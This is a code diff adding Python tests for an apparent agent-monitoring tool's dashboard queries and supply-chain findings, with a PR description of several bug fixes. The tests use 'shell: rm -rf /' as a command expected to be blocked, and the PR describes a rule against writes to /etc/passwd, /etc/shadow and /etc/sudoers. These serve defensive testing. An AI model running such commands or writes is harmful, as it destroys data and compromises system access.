+        self.assertIn("shell: ls -la", actions)
+        self.assertNotIn("shell: rm -rf /", actions)
+
+        blocked_only = get_events_page(verdict="blocked")
+        actions = [item["action"] for item in blocked_only["items"]]
+        self.assertIn("shell: rm -rf /", actions)
+        self.assertNotIn("shell: ls -la", actions)
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/tests/test_store_dashboard_queries.py
+++ b/tests/test_store_dashboard_queries.py
@@ -20,7 +20,11 @@ from prismor.runtime.store import (
     get_events_page,
     get_findings_page,
     save_session_snapshot,
+    write_supply_chain_event,
 )
+from supplychain.ecosystems.detector import PackageSpec
+from supplychain.ecosystems.metadata import PackageMetadata
+from supplychain.scoring.engine import PackageVerdict, Signal
 
 
 class TestDashboardQueries(unittest.TestCase):
@@ -84,6 +88,53 @@ class TestDashboardQueries(unittest.TestCase):
         actions = [item["action"] for item in blocked_only["items"]]
         self.assertIn("shell: rm -rf /", actions)
         self.assertNotIn("shell: ls -la", actions)
+
+
+class TestSupplyChainEventIndex(unittest.TestCase):
+    """write_supply_chain_event() inserted findings without event_index, so
+    the matching event in get_events_page() could never resolve to a
+    finding — those events fell back to "allowed" even when a package was
+    actually blocked. Discovered while verifying #130's fix.
+    """
+
+    def setUp(self):
+        self._tmp = tempfile.TemporaryDirectory()
+        self.workspace = Path(self._tmp.name)
+        patcher = patch("prismor.runtime.store.list_registered_workspaces", return_value=[self.workspace])
+        patcher.start()
+        self.addCleanup(patcher.stop)
+
+        spec = PackageSpec(raw="lodash@4.17.19", name="lodash", source="registry", version="4.17.19")
+        meta = PackageMetadata(
+            name="lodash", ecosystem="npm", version="4.17.19", age_days=5185,
+            maintainer_count=1, has_install_script=False, source="registry",
+        )
+        verdict = PackageVerdict(
+            spec=spec, meta=meta, score=75, verdict="block",
+            signals=[Signal(id="ioc_ghsa", points=30, description="Command Injection in lodash")],
+        )
+        write_supply_chain_event(
+            workspace=self.workspace,
+            session_id="supply-chain-test",
+            ts="2026-01-01T00:00:00Z",
+            ecosystem="npm",
+            install_cmd="supplychain npm install lodash@4.17.19",
+            verdicts=[verdict],
+        )
+
+    def tearDown(self):
+        self._tmp.cleanup()
+
+    def test_blocked_package_event_shows_as_blocked(self):
+        data = get_events_page()
+        blocked = [i for i in data["items"] if "lodash" in i["action"]]
+        self.assertEqual(len(blocked), 1)
+        self.assertEqual(blocked[0]["verdict"], "blocked")
+
+    def test_finding_is_returned_and_linked_to_its_event(self):
+        data = get_findings_page()
+        self.assertEqual(data["total"], 1)
+        self.assertIn("lodash", data["items"][0]["trigger"]["detail"])
 
 
 if __name__ == "__main__":


### PR DESCRIPTION
## Summary

Six real bugs found during a full pass over every command in `docs/cli-reference.md` (tested in an isolated sandbox, cross-checked against the CLI, the raw hook scripts, the SDK adapters, and the dashboard's HTTP API).

- **Closes #127** — writes to `/etc/passwd`, `/etc/shadow`, `/etc/sudoers` were completely unflagged in enforce mode (the rule naming these paths only fired on `shell`/`file_read`, never `file_write`). New `auth-file-write` rule (CRITICAL/block) closes it, covering both the direct-path-write and shell-redirect forms.

- **Closes #131** — `$PRISMOR_HOME` was only honored by cloak's `secrets_dir()` and `sweep.py`. `iam.py`, `canary.py`, and `agents.py` all hardcoded `Path.home()`. Worse, `store.py` had its own **duplicate** `_secrets_dir()` missing the `$PRISMOR_HOME` fallback tier — the exact function backing the session-store's own "scrub every secret before persisting" safety net — and its own duplicate `get_enrollment()` with no override at all, used by the dashboard, which could disagree with `prismor enroll-status` about whether the device is enrolled. Consolidated everything on one `store.prismor_home()` helper.

- **Closes #126** — `uninstall-hooks --agent claude` (or `all`) silently also strips cloak protection as an unavoidable side effect (cloak shares `.claude/settings.json` with the runtime-monitor hooks). Now called out explicitly in the command's own output, `--help`, and the CLI reference.

- **Closes #129** — dashboard `/api/findings` always returned zero results. The query correlated an outer column (`f.event_index`) inside a subquery's `OFFSET` clause, which SQLite rejects (`no such column`, even though the column exists) — WHERE-clause correlation works, OFFSET-clause correlation doesn't. The exception was silently swallowed by a blanket `except Exception: pass`, so it just looked like "no findings." Rewritten with a `ROW_NUMBER()` CTE joined on equality instead.

- **Closes #130** — dashboard `/api/events` computed verdict/severity from `s.findings_count > 0` (session-wide) instead of per event, so a benign, allowed `ls -la` showed as `"blocked"`/`"critical"` purely because it happened to share a session with an unrelated blocked event. Now resolved per event via the same `ROW_NUMBER()` join.

- **Closes #128** — `policy validate` crashed with a raw Python traceback on malformed YAML instead of a clean validation error.

- **Closes #132** — `docs/cli-reference.md` listed `workspace show` and `exempt status` as subcommands; neither exists (`workspace` with no argument shows status; `exempt` only has `request`).

## Test plan

- [x] `python -m pytest tests/` — 735 passed (726 baseline + 9 new regression tests)
- [x] New `tests/test_store_dashboard_queries.py` builds a real session through `save_session_snapshot`/`analyze_events` (the same path `prismor ingest` and the dashboard use) and asserts `get_findings_page()`/`get_events_page()` return correct, per-event results — this test file didn't exist before; neither query had *any* coverage, which is how both bugs shipped unnoticed
- [x] New `tests/test_prismor_home_consistency.py` asserts `iam`/`canary`/`agents`/`store.get_enrollment()` all resolve the same `$PRISMOR_HOME` override consistently
- [x] New `PolicyEngine`-level tests for `auth-file-write` (blocks passwd/shadow/sudoers writes, doesn't flag `passwd.bak`-style near-misses)
- [x] Manually verified `prismor uninstall-hooks --agent claude` now prints the cloak warning; `prismor policy validate` on malformed YAML now reports cleanly; dashboard `/api/findings` and `/api/events` return correct data against a real ingested session, verified both via direct Python calls and the actual HTTP endpoints

- **Closes #134** — `write_supply_chain_event()` never set `event_index` on the findings it recorded (found while verifying #130), so a blocked `prismor supplychain npm install ...` showed as `verdict: "allowed"` in the dashboard Events tab despite having a real CRITICAL/HIGH finding. Now set from the loop index, matching how `get_events_page()` resolves findings to events.
